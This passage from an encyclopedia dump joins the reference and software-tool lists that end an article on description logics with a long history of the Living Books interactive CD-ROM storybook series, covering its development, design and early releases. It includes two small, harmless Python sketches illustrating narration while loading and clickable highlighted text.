Patel-Schneider: The Description Logic Handbook: Theory, Implementation, Applications. Cambridge University Press, Cambridge, UK, 2003. Ian Horrocks, Ulrike Sattler: Ontology Reasoning in the SHOQ(D) Description Logic, in Proceedings of the Seventeenth International Joint Conference on Artificial Intelligence, 2001. D. Fensel, F. van Harmelen, I. Horrocks, D. McGuinness, and P. F. Patel-Schneider: OIL: An Ontology Infrastructure for the Semantic Web. IEEE Intelligent Systems, 16(2):38-45, 2001. Ian Horrocks and Peter F. Patel-Schneider: The Generation of DAML+OIL. In Proceedings of the 2001 Description Logic Workshop (DL 2001), volume 49 of CEUR <http://ceur-ws.org/>, pages 30–35, 2001. Ian Horrocks, Peter F. Patel-Schneider, and Frank van Harmelen: From SHIQ and RDF to OWL: The Making of a Web Ontology Language. Journal of Web Semantics, 1(1):7-26, 2003. Bernardo Cuenca Grau, Ian Horrocks, Boris Motik, Bijan Parsia, Peter Patel-Schneider, and Ulrike Sattler: OWL 2: The next step for OWL. Journal of Web Semantics, 6(4):309-322, November 2008. Franz Baader, Ian Horrocks, and Ulrike Sattler: Chapter 3 Description Logics. In Frank van Harmelen, Vladimir Lifschitz, and Bruce Porter, editors, Handbook of Knowledge Representation. Elsevier, 2007. Alessandro Artale and Enrico Franconi: Temporal Description Logics. In Handbook of Temporal Reasoning in Artificial Intelligence, 2005. Web Ontology (WebONT) Working Group Charter. W3C, 2003 World Wide Web Consortium Issues RDF and OWL Recommendations. Press Release. W3C, 2004. OWL Working Group Charter. W3C, 2007. OWL 2 Connects the Web of Knowledge with the Web of Data. Press Release. W3C, 2009. Markus Krötzsch, František Simančík, Ian Horrocks: A Description Logic Primer. CoRR . 2012. A very first introduction for readers without a formal logic background. Sebastian Rudolph: Foundations of Description Logics. In Reasoning Web: Semantic Technologies for the Web of Data, 7th International Summer School, volume 6848 of Lecture Notes in Computer Science, pages 76–136. Springer, 2011. (springerlink)Introductory text with a focus on modelling and formal semantics. There are also slides. Jens Lehmann: DL-Learner: Learning concepts in description logics, Journal of Machine Learning Research, 2009. Franz Baader: Description Logics. In Reasoning Web: Semantic Technologies for Information Systems, 5th International Summer School, volume 5689 of Lecture Notes in Computer Science, pages 1–39. Springer, 2009. (springerlink) Introductory text with a focus on reasoning and language design, and an extended historical overview. Enrico Franconi: Introduction to Description Logics. Course materials. Faculty of Computer Science, Free University of Bolzano, Italy, 2002. Lecture slides and many literature pointers, somewhat dated. Ian Horrocks: Ontologies and the Semantic Web. Communications of the ACM, 51(12):58-67, December 2008. A general overview of knowledge representation in Semantic Web technologies. External links Description Logic Complexity Navigator, maintained by Evgeny Zolin at the Department of Computer Science List of Reasoners, OWL research at the University of Manchester Reasoners There are some semantic reasoners that deal with OWL and DL. These are some of the most popular: CEL is an open source LISP-based reasoner (Apache 2.0 License). Cerebra Engine was a commercial C++-based reasoner, acquired in 2006 by webMethods. FaCT++ is a free open-source C++-based reasoner. 
KAON2 is a free (for non-commercial use) Java-based reasoner, offering fast reasoning support for OWL ontologies.
MSPASS is a free open-source C reasoner for numerous DL models.
Pellet is a dual-licensed (AGPL and proprietary) commercial, Java-based reasoner.
RacerPro of Racer Systems was a commercial (free trials and research licenses were available) Lisp-based reasoner. Today an open-source version of RACER exists from the original developers at Lübeck University under the BSD 3 license, as well as a commercialized version, still named RacerPro, from Franz Inc.
Sim-DL is a free open-source Java-based reasoner for the language ALCHQ. It also provides similarity measurement functionality between concepts; to access this functionality a Protégé plugin can be used.
HermiT is an open-source reasoner based on the "hypertableau" calculus. It is developed by the University of Oxford.
Owlready2 is a package for ontology-oriented programming in Python. It can load OWL 2.0 ontologies as Python objects, modify them, save them, and perform reasoning via HermiT (included). Owlready2 allows transparent access to OWL ontologies (in contrast to the usual Java-based APIs).

Editors
Protégé is a free, open-source ontology editor and knowledge base framework, which can use DL reasoners offering a DIG interface as a back end for consistency checks.
, an OWL browser/editor that takes the standard web browser as the basic UI paradigm.

Interfaces
, a standardized XML interface to DL systems developed by the DL Implementation Group (DIG).
, a Java interface and implementation for the Web Ontology Language, used to represent Semantic Web ontologies.

Knowledge representation languages Non-classical logic Information science Artificial intelligence
3331902
https://en.wikipedia.org/wiki/Living%20Books
Living Books
Living Books is a series of interactive read-along adventures aimed at children aged 3–9. Created by Mark Schlichting, the series was mostly developed by Living Books for CD-ROM and published by Broderbund for Mac OS and Microsoft Windows. Two decades after the original release, the series was re-released as Wanderful Interactive Storybooks for iOS and Android.

The series began in 1992 as a Broderbund division that started with an adaptation of Mercer Mayer's Just Grandma and Me. In 1994, the Living Books division was spun off into its own children's multimedia company, jointly owned by Broderbund and Random House. The company continued to publish titles based on popular franchises such as Arthur, Dr. Seuss, and the Berenstain Bears. The next few years saw a saturated market begin to squeeze the Living Books company's profits; in 1997 Broderbund agreed to purchase Random House's 50% stake in Living Books and proceeded to dissolve the company. Broderbund was acquired by The Learning Company (formerly SoftKey), Mattel Interactive, and The Gores Group over the following years, and the series was eventually passed to Houghton Mifflin Harcourt, which currently holds the rights. The series lay dormant for many years until former developers of the series acquired the license to publish updated and enhanced versions of the titles under the Wanderful Interactive Storybooks series in 2010. The series has received acclaim and numerous awards.

History
Conception
Inspiration and pitch
The initial motivation behind the series came from a childhood fantasy of Mark Schlichting's to enter into the picture book world of Dr. Seuss's Horton Hears a Who!; to visit the houses of Whoville and interact with the "weird and fantastical instruments and contraptions". As a boy he was enamoured by the fantasy worlds of children's picture books through Dr. Seuss and the magic of animation through Disney. Further inspiration came out of his concern as a father of video-gaming boys. By 1986 Schlichting had "Nintendo guilt", observing how his sons were engaged with Nintendo titles for hours, working cooperatively and diligently, but unable to focus on their homework. Their focus was on level mastery, but they couldn't find any titles both educational and fun enough to hold their interest. Schlichting wanted this same level of cognitive involvement with something more substantive, matching the attention-grabbing play aspects of popular games with meaningful content. He devised a concept of "highly interactive animated picture books for children" that would "delight and engage kids but that also had real learning content as well", which would evolve into Living Books. After receiving a degree in fine arts and working as a book publishing art director, he retrained in traditional animation. Schlichting entered the children's software industry in 1987, when he was contracted as a freelance animator and digital illustrator at Broderbund Software for early floppy disk PC games, including games within the Carmen Sandiego franchise such as Europe and U.S.A. By 1988, Schlichting's work at Broderbund led to him securing a full-time position at the company. Schlichting later admitted that he accepted the job offer to be able to sell his concept to Broderbund, believing that the best way to talk Broderbund into spending $1,000,000 on a product for a market that didn't exist was from within the company.
After three months, Broderbund permitted him to create a small prototype in-house, and as source material he used a book he had illustrated called I'm Mine. The "deceptively simple" premise saw Schlichting take the children's story, computerize the artwork, and offer kids the choice of having the computer read the story to them or "play" inside the pages of the book. The title "Living Books" was chosen to represent that everything in the environment is alive and available for the player to experiment with. The then-unknown designer began pitching the CD-ROM-based Living Books around the company "to anyone who would listen" and presented his prototype to demonstrate the concept. Schlichting argued that the "driving force" to make these storybooks interactive was the "natural draw and deep interest" that children experience with technological interaction like games; he therefore wanted to offer the ability to "explore and learn through discovery at their own pace". He pitched, "I wanted to harness some of that natural draw that computers have for kids...You know how flowers follow the sun? That's called heliotropism. Well, kids have a 'computertropism'". He "lobbied his bosses" to allow him to start a CD-ROM division that would "add a new dimension to children's books", pitching to increasingly senior staff, from his superior Michele Bushneff, to her boss, Broderbund Vice President John Baker, and eventually reaching Broderbund co-founder and CEO Doug Carlston, all of whom offered encouragement in different ways. Baker felt that the idea of talking computer books was "obvious and simple" and that it was difficult to imagine them holding the interest of a child; he also thought that parents, through their own animated real-life storytelling, could create the same amount of "involvement and character identification" as an onscreen book. However, he conceded that the medium offered an opportunity to "charm" the user through its design.

Approval and prototypes
In 1989, Dutch electronics hardware manufacturer Philips happened to observe the Living Books prototype while on a tour of the Broderbund offices, and offered the company $500,000 to produce a title that would run on a new television set-top box it was in the process of developing. As a result, after four months of pitching, Schlichting was given the go-ahead by Carlston to put together a prototype using an early version of what became Macromedia Director. Carlston was drawn to the idea because he had noticed a demographic trend of births among Broderbund staff jumping to 15 a year, suggesting a "demand for software to help small children learn". Living Books married this demographic trend to the new CD-ROM technology that Schlichting was interested in. Baker was put in charge of Living Books. According to the St. Louis Post-Dispatch, Schlichting "persuaded his employer" to "spend millions of dollars on his notion to create Living Books". As a result, Schlichting's demo concept became a development group. By 1990, Broderbund's Living Books group had fewer than five people. After a few months of development, the first fully featured prototype for Living Books was complete; it was an adaptation of Mercer Mayer's Little Monster at School. This beta version included two pages to demonstrate how a transition might work, had the main character narrate the story, and included highlighted text as he read. Schlichting and his son provided the voices for the baby and the young protagonist respectively.
The product was designed as a "reading product" as well as a storybook; Schlichting wanted children to have a "relationship with the text". He turned off the mouse cursor until the story was read so they had to watch the words. Schlichting utilised a "child-informed design approach", playtesting the game with children and listening to their feedback, thereby allowing children to "contribute to and critique product development". He wanted the programs to not only be made "for kids" but "with kids". The offices were filled with toys and none of the staff wore ties. The original concept saw a child narrator deliver the story from a proscenium arch with the text above their head, but upon play-testing Schlichting discovered that children's eyes were fixated on the narrator's mouth and they weren't following the words, which led to a less-is-more design decision. To resolve this, he made the highlighted text the only animation, with nothing else moving, so users focused on the words while the story was being read, followed by the animated action. Schlichting took teachers' comments seriously and "incorporated their suggestions into the designs". Feedback offered by teachers included a request to make the program simple and straightforward to use so they wouldn't have to become technology experts. The prototype was ultimately successful, though the developers also noted the delayed reactions once hotspots were clicked, which affected the game's interactivity. Michael Coffey was brought in as their first programmer to help the team work out the technology required to implement their ideas. Meanwhile, Broderbund publicly announced the Living Books project of CD-ROM animated, talking children's stories in August 1991. Mercer Mayer's popular children's book Just Grandma and Me was chosen as the premiere title of the new series, as their initial attempt at "eras[ing] the line between learning and playing". This was because Mayer owned the book rights outright, which made negotiation easier; Mayer opted not to collaborate directly with Living Books on the adaptation, though he did offer approvals during development. With the support of Broderbund management, the team evolved into Broderbund's Living Books division; they moved to an open office area and added more staff who were allocated to the project. Schlichting originally served as Living Books' creative director, and in 1996 he would be promoted to VP of research and design. Schlichting commented, "it became clear that I was not selling a product idea, but creating a shared vision about how we could make a difference, and that shared vision influenced how the entire company felt about our work together for years to come".

Development (1990–1992)
Creative arts
Though storyboards and layouts were often sketched out on paper, most of the animation was developed straight into the software instead of being scanned first. All the creative assets were developed on the Mac, as Living Books believed its media tools were the most advanced. The team used Photoshop for basic painting and Illustrator for work that required scaling as it moved; meanwhile the animation was completed in Macromedia Director and then converted to a special format using Broderbund's proprietary rendering/interaction engine. Technical designer Barbara Lawrence worked on digital backgrounds, while ex-Disney animator Don Albretch assisted with animations. Animators like Donna Bonifield worked in the attic with rows of CRT-screen computers in a room that reached 120 degrees.
Schlichting opted for an animation style instead of using live video clips. As Broderbund didn't have a recording studio, sound designer Tom Rettig individually recorded and saved each audio file in a small office. Living Books' first full-time sound designer and musician, Joey Edelman, wrote the Living Books theme and dance themes for their earlier stories. Edelman had previously worked at Computers and Music, a pioneering audio software company that would be used to develop the sound of Living Books; software companies Digidesign and Opcode would ask Edelman what sounds he wanted for his projects, to be released in upcoming versions of their programs. Roy Blumenfeld served as audio engineer for The Cat in the Hat. When Schlichting created a sound effect for a falling leaf, he named it "Ode to Goofy" in honour of the Disney character. Schlichting sought colleagues to serve as voice actors, and this process helped the office become invested and champion the project. Often, ancillary characters were played by Living Books staff; Grandma in Just Grandma and Me was played by Schlichting himself and his son played Little Critter, while sound designers Bob Marshall and Edelman played Tortoise and Hare in The Tortoise and the Hare. One scene containing cabbages in motion required the entire staff to go into the sound studio and run around. It took up to 15 takes to record words and sentences correctly; they had to be recorded carefully in order to get the speech right. The sound designers found it difficult to achieve exact sync when sound, CD-ROM, and animation play at varying speeds on different CPU machines. The animation also had to be carefully tuned in order to match the speed limitations of low-end machines. Issues could arise with assets, such as a bus coming onto the screen with a large part of it missing off screen. The team noted any times that child playtesters started clicking before the end of a gag, as this was a sign it wasn't working. In some cases, sound was emphasized to compensate for the limits in animation. Graphic technician Rob Bell served as a bridge between the animators and programmers, editing the artists' work to fit into the program and advocating for program edits to fit the artists' vision. Karl Ackerman worked for Living Books as a prototyper, doing concept and programming work on games. Proposed product ideas that were ultimately unsuccessful included adaptations of Between the Lions, Eager Ogre's Pet Show, Nickelodeon's Rugrats, Sesame Street, and Sing Along: Maggie's Farm, among others, as well as a Story Book Maker title in 1996. A group of Broderbund producers – Clair Curtain, Todd Power, and Rob Martyn – was brought in to help Living Books stay on budget and schedule. Around this time, Mickey Mantle was hired as Broderbund CTO and became an advocate for his "pet project" Living Books, working closely with the programmers to ensure the work was delivered. Lucinda Ray joined Brøderbund from 1993 to 1999 as Education Product Manager, where she managed the development and editing of more than 60 Teacher's Guides to accompany Brøderbund and Living Books' Living Books School Editions. From 1990, Donna Bonifield worked in production roles and over four years rose to become Living Books' Technical Creative Director in 1994. Living Books was considered a skunkworks project by its team, who believed it was kept away from the main building to shield it.
At one point Baker, who by this point had championed the series, tried to raise money from potential investors at Sony to be able to continue the fledgling project. Edelman jokingly referred to the working conditions as a sweatshop; meanwhile, Lawrence shared an office room with Schlichting and frequently heard his disagreeable phone calls.

Programming
Schlichting campaigned for tools technologically ahead of their time to improve quality. In the early 1990s, CD-ROMs represented a "dramatic leap forward" and the promise that computers could offer immersive, interactive experiences. Software designers such as Schlichting looked to the new medium as an opportunity to reinvent the classic children's book. In response, Broderbund offered Schlichting an additional team of programmers. At this point in time, most Broderbund products were built primarily by one programmer per title, with assistance from contractors along the way. However, Schlichting wanted an engine that would allow the game to be pre-emptively designed to play across multiple platforms (Mac, PC, etc.), thereby allowing the CD-ROM to become more interactive than it had been in the past. Programmer Glenn Axworthy created the Living Books engine, which made it possible for products to be written in Macromedia Director and then edited into a "cross-platform, optimized playback format" that slow-speed CD-ROM drives could play on limited-memory computers at the appropriate speed, "regardless of the speed of the CPU of the computer running the product". The Living Books engine "served as the foundation for the entire product line" and the same underlying technology was still being used in 1998, just with better animation and interactive design. The playback engine was designed to work across platforms without the animation needing to be redone. Matt Siegel created an animation driver that made "animations run consistently fast regardless of their size". This unique CD-ROM playback/interaction driver required three years of development by a core team of three programmers, who had to resolve issues such as compression, cross-platform operation, timing, and device control. The cutting-edge technology was used to make pages load, characters dance, and perfect the interactivity without much tweaking required. Key to the programming was devising a way to allow for instantaneous mouse responses. This was "crucial", as without it playtesters would become frustrated by the delayed response to their mouse. The driver applied a "running man" during the delay between book pages, loading the animations while the program read the text aloud on each new page so they were ready to play. The driver would stream sound to occupy the user while images and animation were being loaded. This "trick", of turning off ambient movements until the biggest movement had finished playing, allowed Living Books to squeeze the program down to 2MB of RAM. Just Grandma and Me ended up using 128MB of the available CD-ROM space. Later, graphic technician Rob Bell expanded the program with the interpreted language S-Lang, which offered even greater possibilities. This driver allowed the creative team to work on quality without worrying about CD-ROM limitations. Schlichting considered the programmers the "hidden magic" behind Living Books.
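The page-turn behaviour described above can be pictured with a small sketch. The following Python snippet is only an illustration of the general idea (narration streams to occupy the listener while the page's animation assets load in the background, so hotspots respond instantly once the reading ends); it is not Broderbund's actual driver, and every name, timing, and data structure in it is hypothetical.

# Minimal sketch of "narrate while loading", assuming made-up page data.
import threading
import time

PAGES = {
    1: {"narration_secs": 2.0, "animations": ["wave", "crab", "starfish"]},
    2: {"narration_secs": 1.5, "animations": ["bus", "seagull"]},
}

def stream_narration(page_id: int) -> None:
    """Stand-in for streaming the page's narration audio while it plays."""
    print(f"[audio] narrating page {page_id}...")
    time.sleep(PAGES[page_id]["narration_secs"])
    print(f"[audio] narration for page {page_id} finished")

def preload_animations(page_id: int, cache: dict) -> None:
    """Stand-in for pulling animation assets off the slow CD-ROM into RAM."""
    loaded = []
    for name in PAGES[page_id]["animations"]:
        time.sleep(0.3)          # pretend each asset takes time to read
        loaded.append(name)
    cache[page_id] = loaded
    print(f"[loader] page {page_id} animations ready: {loaded}")

def turn_to_page(page_id: int, cache: dict) -> None:
    # The narration keeps the child occupied while the loader works in parallel.
    loader = threading.Thread(target=preload_animations, args=(page_id, cache))
    loader.start()
    stream_narration(page_id)
    loader.join()                # by now the hotspots can respond instantly
    print(f"[page] page {page_id} is now fully interactive\n")

if __name__ == "__main__":
    asset_cache: dict = {}
    for page in (1, 2):
        turn_to_page(page, asset_cache)

Running the sketch prints the narration and loading steps interleaved, which is the essence of the trick: the wait for the CD-ROM is hidden behind audio the child is already listening to.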
Further advancements made it easier to play; in 1996, a Living Books product would be used in a successful demo by Narrative Communications, in which Macromedia Shockwave compression and other technology was used to compress it from 2.5MB to 1.4MB. By 1997, Broderbund was able to "cram" eight Living Books titles onto a single CD-ROM as part of their Living Books Library series. To run Just Grandma and Me, a computer required the following hardware specifications and system requirements: a PC with an 80386 processor and a 512x384 display, four megabytes of memory, a VGA monitor and adapter capable of displaying 256 colors or a 386 "MPC" machine with SuperVGA, a CD-ROM (compact disc) drive and a sound card compatible with Sound Blaster, Pro Audio Spectrum or Tandy sound devices, plus a Microsoft Windows operating environment. It also had to be able to run on computers ranging from a Mac LC to a Quadra 800, with consistent responsiveness. Noting that the market for Intel/MPC machines was double that of the Mac market, Schlichting looked into alternative systems to design Living Books for. He investigated CD-i devices like Philips' but found the "resolution low, the interface clunky, and the format difficult to work with". As the series was mouse-driven, he found Nintendo-style game controllers inappropriate; however, he thought the 3DO box had "a lot of promise". In the end no alternative systems would be used, except for the Tandy Video Information System and Philips CD-i consoles, on which Just Grandma and Me and Little Monster at School were released within a few months of their respective releases on PC/Mac. Just Grandma and Me accompanied Tandy's launch in October 1992, and the title suited Tandy's positioning as "provid[ing] fun in the process of learning" instead of being a video gaming console; Living Books users were able to engage with hotspots using their remote control. In September 1991, Doug Carlston told Digital Media, "It's usually a truism that as storage capacity expands, costs go up accordingly... But this isn't the case for CDs, which for 75 cents hold what would cost $5 to store on floppies", a significant margin increase given the lowered cost of goods in a $50 entertainment product. Carlston suggested that the cost to produce a Living Book would "eventually be under $100,000 — 'substantially less' than a typical floppy-based title". He noted, "At this point, we're building engines for each optical platform, so we can just go directly from the data stream to the product, with no programming at all. When we started this project two years ago, we decided the 'virtual machine' approach was the only way it seemed to make sense — it was a simple programming question. There was no rush to market, because there was no market."

Design
Interactivity design
Interactivity was vital in the design of the programs; when presenting demos to corporate executives, Schlichting would observe them fighting over the mouse and suggesting where to click. The games were packed with interactive hotspots. Schlichting chose to make "everything that looked clickable actually be clickable", saturating each page with hotspots, to ensure the user was in control and supported in their decisions. He selected existing picture books, or designed new ones, full of scenes that allowed for a wealth of exploration through clicking. All the objects, characters and individual words were "alive" and triggered by contact. Some hotspots were related to the story.
However, peripheral "fun" hotspots were only added sparingly, so they would add surprise and offer "intermittent reinforcement" to encourage further exploration. Examples in Just Grandma and Me include clams that sing in perfect three-part harmony, and a starfish that performs a vaudevillian routine with a top hat and cane. Interaction was designed to be "non-obvious", with hotspots including inanimate objects like chairs. On average, Arthur's Computer Adventure has 23 hotspots per screen, while five activities are included within the program. The Tortoise and the Hare contained around seven times as many incidental hotspots as supplemental ones. The gags were more layered in Dr. Seuss's ABC, such that the user could click the same hotspot multiple times and get different responses. Arthur's Teacher Trouble had secret paper aeroplanes on every page; the Broderbund hint hotline received calls into the early morning asking where these planes were hidden. Activities were added to help develop matching, rhyming, memory and observation skills, among others. Each activity has three levels of difficulty. Stellaluna contained a "Bat Quiz" to teach scientific facts about bats. Arthur's Reading Race contains an activity called Let Me Write, which allows kids to drag and drop screen objects onto a simple sentence to modify it or create their own. The title also contained a spelling mini-game, separate from the story, which users could play against an opponent or the computer. In Arthur's Computer Adventure, which combined a storybook with an activity center, users were able to play the in-universe title Deep Dark Sea that is central to the plot. The soundscape was important to the series; each title consists of hundreds of digital voices and sound effects, such as waves splashing, breezes blowing, and birds chirping in the case of Just Grandma and Me. Some of the sound effects were "clever"; for example, the poppy flowers made popping noises, and the rocks performed rock 'n' roll guitar riffs. One of the later titles, The Berenstain Bears in the Dark, featured an all-original soundtrack with bluegrass musicians, including Mike Marshall, Sally van Meter, Tony Furtado, and Todd Phillips, while Stellaluna had a soundtrack of original music interwoven with African percussion. The band The Wild Mangos provided original songs for The Tortoise and the Hare, while Gary Schwantes produced music for Dr. Seuss's ABC. Harry and the Haunted House came with 9 original songs which could be played on a CD player. The original songs in Sheila Rae, the Brave, about the adventures of a mouse heroine, featured lyrics that turn into pictures of the things they describe to encourage word recognition. They were written by Living Books composer Pat Farrell. In 1996, Living Books released their first sing-along animated storybook program. Upon previewing a gag in Just Grandma and Me where a bird swoops across the screen with an aeroplane sound effect, developers noted that it elicited laughs and chuckles in the audience. The developers realised that with their visual awareness focused on the animation, the incongruent audio had a more subconscious cognitive impact, and the discrepancy between sound and image created a "brain hiccup" where users would find the moment "cute" but be unsure exactly why.

Ease of use design
Ease of use was another important design philosophy; the interface was designed such that it could be used by even the youngest of children unaccompanied.
Schlichting wanted the series to be "as easy to use as CD-audio". Decisions are presented as a straightforward choice, and "'yes' or 'no'" is consistently used throughout. Dust or Magic: Creative Work in the Digital Age asserted that this is an application of Brenda Laurel's "communities of agents" concept, in which "helper characters engage in direct dialogue with the player and invite complicity"; it notes that in the Quit screen, the "Yes" character nods mischievously as if to say "Go on, do it!", so that the player is urged to ignore the "No" character, who appears anxious and forlorn. Schlichting observed that teachers wanted something to occupy children for 20 minutes at a time. They wanted to be able to say "You and you, go play with Living Books" and then attend to the children needing support; as a result, Living Books was designed to require no installation and to play as soon as the CD was inserted and users clicked on the icon. When Schlichting was first designing Living Books, he visited computer stores to observe how software was displayed and marketed, and noted that stores used their games' assets to show off the computer's capabilities. As a result, he developed an "attract mode" in which, at the beginning before the story starts, the main character directly addresses the user by introducing themselves, teaches the child how to play, and then invites them to participate. In Just Grandma and Me, the narrator Little Critter tells the user, "To have the story read to you, press this button. To play inside the story, press this button", pointing to the appropriate button onscreen. Instead of repeating the talk loop, he opted for a dance loop with music that would encourage kids to dance in the store, bringing the product attention. Important to his design was to never leave the screen static; to always have a piece of animation playing to say to the user "I'm alive. I'm alive". Users had the option to flip to their chosen screen directly without having to wait for preceding pages to play out. Living Books included the printed versions of the paperback books with the software to ensure there would be continuity, where kids could play between the two, and to encourage non-digital reading. Additionally, children were able to follow along in the physical book as the program read the story, and parents had the option of reading to the child the "old-fashioned way".

Language design
A challenge of the series was inviting children to engage with the "black-and-white abstraction" of text when the relatable imagery proved more enticing. Schlichting found that a program can capture 80% of a child's attention for spoken information that they can both see and interact with. Living Books experimented with "living" text, where children could tap on any word and hear it pronounced, or build the whole sentence word by word. Schlichting chose to highlight the text because he "found kids follow anything that moves...we could get them to follow the reading if that was the only thing on the screen that was moving". One of the biggest benefits of using a CD-ROM was the "ability to store lots of high quality speech". Every word had to be recorded in two different styles, once as part of the story and once as individual words which could be clicked on one by one. The individual words were recorded with fluctuation to match how they would fit into the larger sentence; this allowed emerging readers to map the language and construct the story in sentence units.
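As an illustration of the "living" text behaviour described above, the short Python sketch below pairs each word with two recordings (one as read in the flow of the sentence, one spoken in isolation) and highlights each word as it is narrated. It is only a toy reconstruction of the idea, not the Living Books engine, and every name and file path in it is hypothetical.

# Minimal sketch of highlighted, clickable "living" text, with made-up data.
from dataclasses import dataclass

@dataclass
class Word:
    text: str
    story_clip: str     # recording used while the sentence is narrated
    isolated_clip: str  # recording played when the child clicks the word

SENTENCE = [
    Word("We", "we_story.aiff", "we_alone.aiff"),
    Word("went", "went_story.aiff", "went_alone.aiff"),
    Word("to", "to_story.aiff", "to_alone.aiff"),
    Word("the", "the_story.aiff", "the_alone.aiff"),
    Word("beach.", "beach_story.aiff", "beach_alone.aiff"),
]

def play(clip: str) -> None:
    print(f"  [audio] playing {clip}")

def narrate(sentence):
    """Read the sentence aloud, highlighting each word as it is spoken."""
    for word in sentence:
        print(f"[highlight] {word.text}")
        play(word.story_clip)

def click_word(word: Word) -> None:
    """A click on any word replays it on its own, pronounced in isolation."""
    print(f"[click] {word.text}")
    play(word.isolated_clip)

if __name__ == "__main__":
    narrate(SENTENCE)
    click_word(SENTENCE[1])   # e.g. the child taps "went" to hear it again

Because the highlight is the only thing moving during narration, the child's eye follows the text, and the per-word recordings let them rebuild the sentence in any order they like.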
The New Kid on the Block, which presented a collection of 18 funny poems by poet Jack Prelutsky, allowed players to click on the words to reveal a representative animation of the noun or verb, turning the program into a "living dictionary". This was used as an alternative to having the player click on illustrations directly. The first two titles in the series both had English and Spanish language settings, while Just Grandma and Me could also be played in French, German, and Japanese, all featured on the one disc; this multilingual feature would be explored in future entries. Most Living Books would be released in US English, UK English, and Spanish. The UK English versions had British accents for all the characters and colloquial words changed when appropriate (e.g., Mum not Mom). The New Kid on the Block is the only monolingual Living Book. The British English dub was published by Brøderbund from 1996 to 2000, and a French dub was published by UbiSoft's Pointsoft label in 1996. While not released in Latin America, the Latin Spanish dub was created from 1992/1993 to 1996 and released in the US version. Two titles were published in Hebrew in 1995, while four titles were dubbed into and published in Japanese and Italian. Just Grandma and Me 2.0 featured a European Spanish dub. Delta's Livros Vivos saw the series published in Brazilian Portuguese in 1998, and the German dub by The Learning Company (formerly SoftKey) was published in 1998 after Broderbund's acquisition by the company. Creating the localised editions often involved reworking the graphics in order to sync the voices and avoid a "dubbed" movie effect. While the series could be used by dual language learners, the titles did not come with a multilingual dictionary. The team also aimed to be "culturally correct" when translating to other languages; for instance, the Arthur character "D.W." was renamed "Dorita" in Spanish after the team realised it was unusual for a local name to start with "W". Compute! suggested that "while the main goal of developing a multilingual program was more than likely an effort to increase its market share, doing so also enhances the story's educational value".

Education design
On the series' potential as a learning tool, Schlichting said, "software never replaces the place of a good teacher, but there are times when the teacher needs help" and that multimedia products "are great ways to do that". Schlichting resisted use of the term "edutainment" to describe the series, though he felt the titles were more substantive than Nintendo games and described them as "invisible education." Marylyn Rosenblum, the vice president of education sales and marketing for Broderbund, commented, "we don't make claims for teaching reading...[instead] we encourage children's natural love of reading." Originally designed for children in preschool and early elementary school aged three to eight, the storybooks found audiences as young as two, and some programs reached kids nine and older. Schlichting noted that while younger players would click the words in sequence to "map the story", older players would click the words out of order to build their own silly sentences, allowing for "greater language play". In Harry and the Haunted House, older players found amusement in creating the sentence "the zombie has a stinky but[t]". This was a serendipitous form of play Schlichting never intended or expected. The user was provided two options to engage: a passive "read to me" mode and the interactive "play along" mode.
By offering different play patterns depending on the user's level of reading fluency, players felt able to "own" the story by "playing with the individual pieces". Users learn to read new words and also discover how words are constructed into sentences. Arthur's Computer Adventure contains 401 words of interactive text estimated to be at a grade 3 readability level. The series included moral lessons; for instance, The Berenstain Bears Get in a Fight was released to help children with conflict resolution. Lucinda Ray, Education Product Manager at Brøderbund, developed the concept for, edited, and produced the Living Books School Edition. These School Editions were developed with the aid of classroom teachers, reading specialists, and curriculum experts, with an integrated language arts approach. School Editions contain: the CD-ROM, a print version of the title book, Lesson Plans, a thematic unit with activities, an annotated bibliography of relevant literature, printable worksheets, and bonus books or audio cassettes. They were designed specifically for teachers who were using the programs in a classroom, and included tech tips like shortcuts and special key commands to help guide the lesson. In 1994, Broderbund produced a supplementary set for teachers called the Living Books Framework, featuring integrated teaching material for each of the first four Living Books titles for $489.95 including the Living Books CD-ROMs; presented in a three-ring binder, the sets featured the original picture storybooks, several other books, and a tape of Jack Prelutsky reading his The New Kid on the Block poems. The kits also contained "A Book Lover Approaches the Computer" articles that addressed key concerns of parents and teachers, technical tips, a curriculum matrix, a thematic unit, and classroom activities.

Independence (1992–1994)
Just Grandma and Me release
Broderbund released their reimagining of Just Grandma and Me in 1992, and while there was an initial concern whether there were enough customers with CD drives to run the game, in the first six months Broderbund sold over 10 times more copies than they had initially projected. MacUser did a speed test on the storybook to check the loading time when turning pages and found that most took less than 15 seconds. Meanwhile, not having his hand in the day-to-day creative process of that work turned Mayer on to the idea of doing CD-ROMs himself. He and his partner, John Sansevere, formed their own company, Big Tuna New Media, to develop Mayer's animated storybooks. Teaming up with GT Interactive, their first two titles were "Just Me and My Dad" (1995) and "Just Me and My Mom" (1996), which according to The Fresno Bee "borrow[ed]" their design from Living Books. Big Tuna New Media would be approached by Disney and DreamWorks for CD-ROM development deals. By August 1992, the title was the interactive storybook genre's "first big hit", and one of the few available for purchase, along with the even earlier Canadian pioneer Discis Knowledge Research's Discis Books, whose 16 Mac titles and 11 CDTV titles had gained widespread classroom acceptance. Founded in 1988, Discis acquired the rights to children's stories and published them as CD-ROM-based interactive children's books. The second Living Books title, Arthur's Teacher Trouble, was debuted at the Consumer Electronics Show, showcasing its first 12 screens. When the game was demoed at trade shows, the developers observed audience reactions, which proved to be a useful learning experience.
Microsoft bought 300 disc copies and sent them to their hardware manufacturers, instructing them to ensure the software could run on their equipment. Before The Tortoise and the Hare was released, a prototype was shown at a trade show where a teacher in attendance noted that a scene where Hare picks up a newspaper, rolls it up, and stomps on it was encouraging kids to litter; in response Living Books redrew the scene, which now showed the tortoise scolding the hare with the line of dialogue "Hey Hare, did you forget to recycle that newspaper?", after which the hare picks up the trash and disposes of it properly. Literacy in Australia: Pedagogies for Engagement singled out this moment for helping users "make sense of character motivations and actions". Due to the success of the first few titles, the Living Books division had the ability to add additional artists and musicians, and the team relocated to a new Broderbund office in Novato, California. When Just Grandma and Me was demoed at the 1992 Computer Game Developers' Conference, the "mesmerized" crowd of around 100 game designers "spontaneously erupted into enchanted choruses of 'Ohhh!' and 'Ahhh!' with every turn of the page". Broderbund expected the Living Books division to become "one of their essential businesses in the years ahead", and planned more products for both the MPC and Mac. The following year, Schlichting demoed Just Grandma & Me, along with two new products, Arthur's Teacher Trouble and the in-development New Kid on the Block, at the 1993 ACM SIGGRAPH conference. In 1996, The Berenstain Bears in the Dark became the first Living Books title to utilise leveling, by offering three different degrees of difficulty for its activities, and the first to employ a 640 x 480 pixel screen size (formerly 512 x 384). These early successes "set off a frenzy of imitation by other companies", of which 7th Level's TuneLand was deemed the best by The Washington Post.

Joint venture
